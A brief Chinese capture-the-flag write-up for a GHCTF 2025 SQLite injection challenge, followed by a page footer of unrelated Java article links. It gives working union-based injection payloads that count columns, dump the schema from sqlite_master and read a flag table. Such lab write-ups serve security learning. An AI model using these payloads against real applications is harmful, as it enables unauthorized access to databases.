[GHCTF 2025]SQL???

打开题目在线环境:

先尝试注入:

id=1;show databases;

发现报错,后来看了wp才知道这个题目是SQLite注入。

我看的是这个师傅的wp:

https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334...%2522%257D\&request_id=b2e94c28c4b9713fffb8456c983de1b3\&biz_id=0\&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend\~default-1-146164505-null-null.142^v102^pc_search_result_base9\&utm_term=[GHCTF 2025]SQL\&spm=1018.2226.3001.4187

1.先判断有几列

python 复制代码
? id=1 order by 6 #

到第六列时:

2.爆出来表名

python 复制代码
/?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

所以我们要找的就是flag表里的flag列

直接payload:

python 复制代码
/?id=1 union select 1,2,3,4,flag from flag

在这里插入图片描述

相关推荐
Flittly1 小时前
【AgentScope Java新手村系列】(16)从RAG到多路检索
java·spring boot·spring
小兔崽子去哪了1 小时前
Java 生成二维码解决方案
java·后端
人活一口气6 小时前
从JVM调优到MCP协议:Java全栈技术体系深度总结与企业级架构实践
java·spring boot
NE_STOP8 小时前
Vibe Coding -- 完整项目案例实操
java
荣码8 小时前
GraphRAG:普通RAG只能回答"点"的问题,我踩了4个坑才搞懂
java·python
SimonKing8 小时前
Google第三方授权登录
java·后端·程序员
明月光8188 小时前
从一行 @Builder 说起:重新拾起 Java 的 Lombok、注解与 Builder 模式
java
考虑考虑17 小时前
Mybatis实现批量插入
java·后端·mybatis
咖啡八杯18 小时前
GoF设计模式——中介者模式
java·后端·spring·设计模式
青石路1 天前
记一次多JDK版本问题的排查,一坑套一坑,差点没爬上来
java